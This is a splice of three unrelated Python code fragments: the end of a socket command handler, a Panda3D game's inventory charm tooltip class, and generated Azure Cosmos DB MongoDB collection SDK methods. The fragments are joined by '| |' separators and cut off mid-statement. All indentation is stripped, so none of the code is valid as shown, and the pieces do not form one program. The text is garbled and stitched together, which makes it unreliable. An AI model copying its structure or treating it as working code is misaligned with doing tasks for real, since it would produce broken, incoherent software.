else:
try:
connectionSocket.send("500 Syntax error: command unrecognized")
except:
print "Failed to send message"
return 0
return 0 #
for x | |
from direct.gui.DirectGui import *
from pandac.PandaModules import *
from pirates.piratesgui import GuiPanel, PiratesGuiGlobals
from pirates.piratesbase import PiratesGlobals
from pirates.piratesbase import PLocalizer
from pirates.piratesbase import Freebooter
from otp.otpbase import OTPLocalizer
from pirates.piratesgui.BorderFrame import BorderFrame
from pirates.inventory.InventoryUIGlobals import *
from pirates.inventory import ItemGlobals
from pirates.battle import WeaponGlobals
from pirates.uberdog.UberDogGlobals import *
from pirates.reputation import ReputationGlobals
from pirates.economy import EconomyGlobals
from pirates.inventory import InventoryUIItem
class InventoryUICharmItem(InventoryUIItem.InventoryUIItem):
notify = directNotify.newCategory('InventoryUICharmItem')
def __init__(self, manager, itemTuple, imageScaleFactor=1.0):
InventoryUIItem.InventoryUIItem.__init__(self, manager, itemTuple, imageScaleFactor=imageScaleFactor)
charmIcons = loader.loadModel('models/gui/gui_icons_inventory')
itemType = ItemGlobals.getType(itemTuple[1])
if ItemGlobals.getIcon(itemTuple[1]):
self['image'] = charmIcons.find('**/%s' % ItemGlobals.getIcon(itemTuple[1]))
self['image_scale'] = 0.1 * imageScaleFactor
self.helpFrame = None
self.cm = CardMaker('itemCard')
self.cm.setFrame(-0.3, 0.3, -0.09, 0.09)
self.buffer = None
self.lens = PerspectiveLens()
self.lens.setNear(0.1)
self.lens.setAspectRatio(0.6 / 0.18)
self.realItem = None
self.itemCard = None
self.portraitSceneGraph = NodePath('PortraitSceneGraph')
detailGui = loader.loadModel('models/gui/gui_card_detail')
self.bg = detailGui.find('**/color')
self.bg.setScale(4)
self.bg.setPos(0, 17, -6.3)
self.glow = detailGui.find('**/glow')
self.glow.setScale(3)
self.glow.setPos(0, 17, -6.3)
self.glow.setColor(1, 1, 1, 0.8)
self.setBin('gui-fixed', 1)
self.accept('open_main_window', self.createBuffer)
self.accept('aspectRatioChanged', self.createBuffer)
self.accept('close_main_window', self.destroyBuffer)
return
def destroy(self):
if self.helpFrame:
self.helpFrame.destroy()
self.helpFrame = None
self.destroyBuffer()
if self.itemCard:
self.itemCard.removeNode()
del self.itemCard
self.itemCard = None
if self.realItem:
self.realItem.removeNode()
del self.realItem
self.realItem = None
if self.portraitSceneGraph:
self.portraitSceneGraph.removeNode()
del self.portraitSceneGraph
self.portraitSceneGraph = None
InventoryUIItem.InventoryUIItem.destroy(self)
return
def getName(self):
return PLocalizer.getItemName(self.itemTuple[1])
def getPlunderName(self):
nameText = self.getName()
titleColor = PiratesGuiGlobals.TextFG6
rarity = ItemGlobals.getRarity(self.itemTuple[1])
if rarity == ItemGlobals.CRUDE:
titleColor = PiratesGuiGlobals.TextFG3
elif rarity == ItemGlobals.COMMON:
titleColor = PiratesGuiGlobals.TextFG13
elif rarity == ItemGlobals.RARE:
titleColor = PiratesGuiGlobals.TextFG4
elif rarity == ItemGlobals.FAMED:
titleColor = PiratesGuiGlobals.TextFG5
return (nameText, titleColor)
def showDetails(self, cell, detailsPos, detailsHeight, event=None):
self.notify.debug('Item showDetails')
if self.manager.heldItem or self.manager.locked or cell.isEmpty() or self.isEmpty() or not self.itemTuple:
self.notify.debug(' early exit')
return
inv = localAvatar.getInventory()
if not inv:
return
itemId = self.getId()
self.helpFrame = DirectFrame(parent=self.manager, relief=None, state=DGG.DISABLED, sortOrder=1)
self.helpFrame.setBin('gui-popup', -5)
detailGui = loader.loadModel('models/gui/gui_card_detail')
topGui = loader.loadModel('models/gui/toplevel_gui')
coinImage = topGui.find('**/treasure_w_coin*')
self.SkillIcons = loader.loadModel('models/textureCards/skillIcons')
self.BuffIcons = loader.loadModel('models/textureCards/buff_icons')
border = self.SkillIcons.find('**/base')
halfWidth = 0.3
halfHeight = 0.2
basePosX = cell.getX(aspect2d)
basePosZ = cell.getZ(aspect2d)
cellSizeX = 0.0
cellSizeZ = 0.0
if cell:
cellSizeX = cell.cellSizeX
cellSizeZ = cell.cellSizeZ
textScale = PiratesGuiGlobals.TextScaleMed
titleScale = PiratesGuiGlobals.TextScaleTitleSmall
if len(self.getName()) >= 30:
titleNameScale = PiratesGuiGlobals.TextScaleLarge
else:
titleNameScale = PiratesGuiGlobals.TextScaleExtraLarge
subtitleScale = PiratesGuiGlobals.TextScaleMed
iconScalar = 1.5
borderScaler = 0.25
splitHeight = 0.01
vMargin = 0.03
runningVertPosition = 0.3
runningSize = 0.0
labels = []
titleColor = PiratesGuiGlobals.TextFG6
rarity = ItemGlobals.getRarity(itemId)
rarityText = PLocalizer.getItemRarityName(rarity)
subtypeText = PLocalizer.getItemSubtypeName(ItemGlobals.getSubtype(itemId))
if rarity == ItemGlobals.CRUDE:
titleColor = PiratesGuiGlobals.TextFG24
else:
if rarity == ItemGlobals.COMMON:
titleColor = PiratesGuiGlobals.TextFG13
else:
if rarity == ItemGlobals.RARE:
titleColor = PiratesGuiGlobals.TextFG4
elif rarity == ItemGlobals.FAMED:
titleColor = PiratesGuiGlobals.TextFG5
titleLabel = DirectLabel(parent=self, relief=None, text=self.getName(), text_scale=titleNameScale, text_fg=titleColor, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
self.bg.setColor(titleColor)
tHeight = 0.07
titleLabel.setZ(runningVertPosition)
runningVertPosition -= tHeight
runningSize += tHeight
labels.append(titleLabel)
subtitleLabel = DirectLabel(parent=self, relief=None, text='\x01slant\x01%s %s\x02' % (rarityText, subtypeText), text_scale=subtitleScale, text_fg=PiratesGuiGlobals.TextFG2, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
subtHeight = 0.05
subtitleLabel.setZ(subtHeight * 0.5 + runningVertPosition)
runningVertPosition -= subtHeight
runningSize += subtHeight
labels.append(subtitleLabel)
itemType = ItemGlobals.getType(itemId)
itemSubtype = ItemGlobals.getSubtype(itemId)
model = ItemGlobals.getModel(itemId)
if model:
self.realItem = loader.loadModel('models/inventory/' + model)
if self.realItem:
posHpr = ItemGlobals.getModelPosHpr(model)
if posHpr:
self.realItem.setPos(posHpr[0], posHpr[1], posHpr[2])
self.realItem.setHpr(posHpr[3], posHpr[4], posHpr[5])
elif itemSubtype == ItemGlobals.RAM:
self.realItem.setPos(-1.5, 1.5, -0.6)
self.realItem.setHpr(70, 160, -90)
else:
self.realItem.setPos(0.0, 1.5, -0.06)
self.realItem.setHpr(0, 90, 0)
self.realItem.reparentTo(self.portraitSceneGraph)
iHeight = 0.18
self.createBuffer()
self.itemCard.setZ(runningVertPosition - 0.06)
runningVertPosition -= iHeight
runningSize += iHeight
labels.append(self.itemCard)
itemCost = int(ItemGlobals.getGoldCost(itemId))
if self.cell and self.cell.container:
itemCost = int(itemCost * self.cell.container.getItemPriceMult())
goldLabel = DirectLabel(parent=self, relief=None, image=coinImage, image_scale=0.12, image_pos=Vec3(0.025, 0, -0.02), text=str(itemCost), text_scale=subtitleScale, text_align=TextNode.ARight, text_fg=PiratesGuiGlobals.TextFG1, text_shadow=PiratesGuiGlobals.TextShadow, pos=(halfWidth - 0.05, 0.0, runningVertPosition + 0.08), text_pos=(0.0, -textScale))
labels.append(goldLabel)
specialAttack = ItemGlobals.getSpecialAttack(itemId)
if specialAttack:
attackIcon = self.SkillIcons.find('**/%s' % WeaponGlobals.getSkillIcon(specialAttack))
specialAttackNameLabel = DirectLabel(parent=self, relief=None, image=border, image_scale=0.1, geom=attackIcon, geom_scale=0.1, image_pos=(-0.07, 0.0, -0.05), geom_pos=(-0.07, 0.0, -0.05), text=PLocalizer.getInventoryTypeName(specialAttack), text_scale=PiratesGuiGlobals.TextScaleLarge, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ALeft, text_fg=titleColor, text_font=PiratesGlobals.getInterfaceOutlineFont(), pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
specialAttackRankLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.ItemRank % ItemGlobals.getSpecialAttackRank(itemId), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ARight, pos=(halfWidth - textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
specialAttackType = WeaponGlobals.getSkillTrack(specialAttack)
if specialAttackType == WeaponGlobals.BREAK_ATTACK_SKILL_INDEX:
specialAttackTypeText = PLocalizer.BreakAttackSkill
elif specialAttackType == WeaponGlobals.DEFENSE_SKILL_INDEX:
specialAttackTypeText = PLocalizer.DefenseSkill
else:
specialAttackTypeText = PLocalizer.WeaponSkill
specialAttackTypeLabel = DirectLabel(parent=self, relief=None, text=specialAttackTypeText, text_scale=PiratesGuiGlobals.TextScaleLarge, text_wordwrap=halfWidth * 2.8 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition - PiratesGuiGlobals.TextScaleLarge), text_pos=(0.0, -textScale))
specialAttackInfo = PLocalizer.SkillDescriptions.get(specialAttack)
specialAttackDescriptionText = specialAttackInfo[1]
specialAttackDescriptionLabel = DirectLabel(parent=self, relief=None, text=specialAttackDescriptionText, text_scale=textScale, text_wordwrap=halfWidth * 2.8 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition - (specialAttackNameLabel.getHeight() + specialAttackTypeLabel.getHeight() - 0.06)), text_pos=(0.0, -textScale))
saHeight = specialAttackNameLabel.getHeight() + specialAttackTypeLabel.getHeight() + specialAttackDescriptionLabel.getHeight() - 0.04
runningVertPosition -= saHeight
runningSize += saHeight
labels.append(specialAttackNameLabel)
labels.append(specialAttackRankLabel)
labels.append(specialAttackTypeLabel)
labels.append(specialAttackDescriptionLabel)
attributes = ItemGlobals.getAttributes(itemId)
for i in range(0, len(attributes)):
attributeIcon = self.SkillIcons.find('**/%s' % ItemGlobals.getAttributeIcon(attributes[i][0]))
if not attributeIcon:
attributeIcon = self.BuffIcons.find('**/%s' % ItemGlobals.getAttributeIcon(attributes[i][0]))
attributeNameLabel = DirectLabel(parent=self, relief=None, image=border, image_scale=0.05, geom=attributeIcon, geom_scale=0.05, image_pos=(-0.07, 0.0, -0.03), geom_pos=(-0.07, 0.0, -0.03), text=PLocalizer.getItemAttributeName(attributes[i][0]), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ALeft, text_fg=titleColor, text_font=PiratesGlobals.getInterfaceOutlineFont(), pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
attributeRankLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.ItemRank % attributes[i][1], text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ARight, pos=(halfWidth - textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
if attributeNameLabel.getHeight() > 0.075:
attributeNameSpace = 0.08
else:
attributeNameSpace = PiratesGuiGlobals.TextScaleLarge
attributeDescriptionLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.getItemAttributeDescription(attributes[i][0]), text_scale=textScale, text_wordwrap=halfWidth * 2.8 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition - attributeNameSpace), text_pos=(0.0, -textScale))
aHeight = attributeNameLabel.getHeight() + attributeDescriptionLabel.getHeight()
runningVertPosition -= aHeight + splitHeight
runningSize += aHeight + splitHeight
labels.append(attributeNameLabel)
labels.append(attributeRankLabel)
labels.append(attributeDescriptionLabel)
skillBoosts = ItemGlobals.getSkillBoosts(itemId)
for i in range(0, len(skillBoosts)):
boostIcon = self.SkillIcons.find('**/%s' % WeaponGlobals.getSkillIcon(skillBoosts[i][0]))
boostNameLabel = DirectLabel(parent=self, relief=None, image=border, image_scale=0.05, geom=boostIcon, geom_scale=0.05, image_pos=(-0.07, 0.0, -0.03), geom_pos=(-0.07, 0.0, -0.03), text=PLocalizer.ItemBoost % PLocalizer.getInventoryTypeName(skillBoosts[i][0]), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ALeft, pos=(-halfWidth + 0.12 + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
boostRankLabel = DirectLabel(parent=self, relief=None, text='+%s' % str(skillBoosts[i][1]), text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.9 / titleScale), text_align=TextNode.ARight, pos=(halfWidth - textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
bHeight = boostNameLabel.getHeight()
runningVertPosition -= bHeight + splitHeight
runningSize += bHeight + splitHeight
labels.append(boostNameLabel)
labels.append(boostRankLabel)
description = PLocalizer.getItemFlavorText(itemId)
if description != '':
descriptionLabel = DirectLabel(parent=self, relief=None, text=description, text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (0.95 / textScale), text_align=TextNode.ALeft, pos=(-halfWidth + textScale * 0.5, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
dHeight = descriptionLabel.getHeight() + 0.02
runningVertPosition -= dHeight
runningSize += dHeight
labels.append(descriptionLabel)
weaponLevel = 0
weaponRepId = WeaponGlobals.getRepId(itemId)
weaponRep = inv.getReputation(weaponRepId)
weaponReq = ItemGlobals.getWeaponRequirement(itemId)
weaponText = None
if weaponReq:
weaponLevel = ReputationGlobals.getLevelFromTotalReputation(weaponRepId, weaponRep)[0]
if weaponLevel < weaponReq:
weaponColor = PiratesGuiGlobals.TextFG6
else:
weaponColor = (0.4, 0.4, 0.4, 1.0)
weaponText = PLocalizer.ItemLevelRequirement % (weaponReq, PLocalizer.getItemTypeName(itemType))
else:
trainingToken = EconomyGlobals.getItemTrainingReq(itemId)
trainingAmt = inv.getItemQuantity(trainingToken)
if trainingAmt == 0:
weaponColor = PiratesGuiGlobals.TextFG6
weaponText = PLocalizer.ItemTrainingRequirement % PLocalizer.getItemTypeName(itemType)
if weaponText:
weaponReqLabel = DirectLabel(parent=self, relief=None, text=weaponText, text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (1.5 / titleScale), text_fg=weaponColor, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
wHeight = weaponReqLabel.getHeight()
runningVertPosition -= wHeight
runningSize += wHeight
labels.append(weaponReqLabel)
if not Freebooter.getPaidStatus(localAvatar.getDoId()):
if rarity != ItemGlobals.CRUDE:
unlimitedLabel = DirectLabel(parent=self, relief=None, text=PLocalizer.UnlimitedAccessRequirement, text_scale=textScale, text_wordwrap=halfWidth * 2.0 * (1.5 / titleScale), text_fg=PiratesGuiGlobals.TextFG6, text_shadow=PiratesGuiGlobals.TextShadow, text_align=TextNode.ACenter, pos=(0.0, 0.0, runningVertPosition), text_pos=(0.0, -textScale))
uHeight = unlimitedLabel.getHeight()
runningVertPosition -= uHeight
runningSize += uHeight
labels.append(unlimitedLabel)
runningVertPosition -= 0.02
runningSize += 0.02
panels = self.helpFrame.attachNewNode('panels')
topPanel = panels.attachNewNode('middlePanel')
detailGui.find('**/top_panel').copyTo(topPanel)
topPanel.setScale(0.08)
topPanel.reparentTo(self.helpFrame)
middlePanel = panels.attachNewNode('middlePanel')
detailGui.find('**/middle_panel').copyTo(middlePanel)
middlePanel.setScale(0.08)
middlePanel.reparentTo(self.helpFrame)
placement = 0
i = 0
heightMax = -0.08
currentHeight = runningVertPosition
while currentHeight < heightMax:
middlePanel = panels.attachNewNode('middlePanel%s' % 1)
detailGui.find('**/middle_panel').copyTo(middlePanel)
middlePanel.setScale(0.08)
middlePanel.reparentTo(self.helpFrame)
if currentHeight + 0.2 >= heightMax:
difference = heightMax - currentHeight
placement += 0.168 / 0.2 * difference
currentHeight += difference
else:
placement += 0.168
currentHeight += 0.2
middlePanel.setZ(-placement)
i += 1
bottomPanel = panels.attachNewNode('bottomPanel')
detailGui.find('**/bottom_panel').copyTo(bottomPanel)
bottomPanel.setScale(0.08)
bottomPanel.setZ(-placement)
bottomPanel.reparentTo(self.helpFrame)
colorPanel = panels.attachNewNode('colorPanel')
detailGui.find('**/color').copyTo(colorPanel)
colorPanel.setScale(0.08)
colorPanel.setColor(titleColor)
colorPanel.reparentTo(self.helpFrame)
lineBreakTopPanel = panels.attachNewNode('lineBreakTopPanel')
detailGui.find('**/line_break_top').copyTo(lineBreakTopPanel)
lineBreakTopPanel.setScale(0.08, 0.08, 0.07)
lineBreakTopPanel.setZ(0.008)
lineBreakTopPanel.reparentTo(self.helpFrame)
panels.flattenStrong()
self.helpFrame['frameSize'] = (
-halfWidth, halfWidth, -(runningSize + vMargin), vMargin)
totalHeight = self.helpFrame.getHeight() - 0.1
for label in labels:
label.reparentTo(self.helpFrame)
if basePosX > 0.0:
newPosX = basePosX - (halfWidth + cellSizeX * 0.45)
else:
newPosX = basePosX + (halfWidth + cellSizeX * 0.45)
if basePosZ > 0.0:
newPosZ = basePosZ + cellSizeZ * 0.45
newPosZ = basePosZ + totalHeight - | |
= pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('MongoDBCollectionGetResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def _create_update_mongo_db_collection_initial(
self,
resource_group_name, # type: str
account_name, # type: str
database_name, # type: str
collection_name, # type: str
create_update_mongo_db_collection_parameters, # type: "_models.MongoDBCollectionCreateUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.MongoDBCollectionGetResults"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.MongoDBCollectionGetResults"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-15"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_update_mongo_db_collection_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(create_update_mongo_db_collection_parameters, 'MongoDBCollectionCreateUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBCollectionGetResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_update_mongo_db_collection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def begin_create_update_mongo_db_collection(
self,
resource_group_name, # type: str
account_name, # type: str
database_name, # type: str
collection_name, # type: str
create_update_mongo_db_collection_parameters, # type: "_models.MongoDBCollectionCreateUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.MongoDBCollectionGetResults"]
"""Create or update an Azure Cosmos DB MongoDB Collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:param create_update_mongo_db_collection_parameters: The parameters to provide for the current
MongoDB Collection.
:type create_update_mongo_db_collection_parameters: ~azure.mgmt.cosmosdb.models.MongoDBCollectionCreateUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either MongoDBCollectionGetResults or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.cosmosdb.models.MongoDBCollectionGetResults]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.MongoDBCollectionGetResults"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_update_mongo_db_collection_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
collection_name=collection_name,
create_update_mongo_db_collection_parameters=create_update_mongo_db_collection_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('MongoDBCollectionGetResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_update_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def _delete_mongo_db_collection_initial(
self,
resource_group_name, # type: str
account_name, # type: str
database_name, # type: str
collection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-15"
# Construct URL
url = self._delete_mongo_db_collection_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_mongo_db_collection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def begin_delete_mongo_db_collection(
self,
resource_group_name, # type: str
account_name, # type: str
database_name, # type: str
collection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes an existing Azure Cosmos DB MongoDB Collection.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_mongo_db_collection_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
collection_name=collection_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'} # type: ignore
def get_mongo_db_collection_throughput(
self,
resource_group_name, # type: str
account_name, # type: str
database_name, # type: str
collection_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ThroughputSettingsGetResults"
"""Gets the RUs per second of the MongoDB collection under an existing Azure Cosmos DB database
account with the provided name.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ThroughputSettingsGetResults, or the result of cls(response)
:rtype: ~azure.mgmt.cosmosdb.models.ThroughputSettingsGetResults
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ThroughputSettingsGetResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-03-15"
accept = "application/json"
# Construct URL
url = self.get_mongo_db_collection_throughput.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
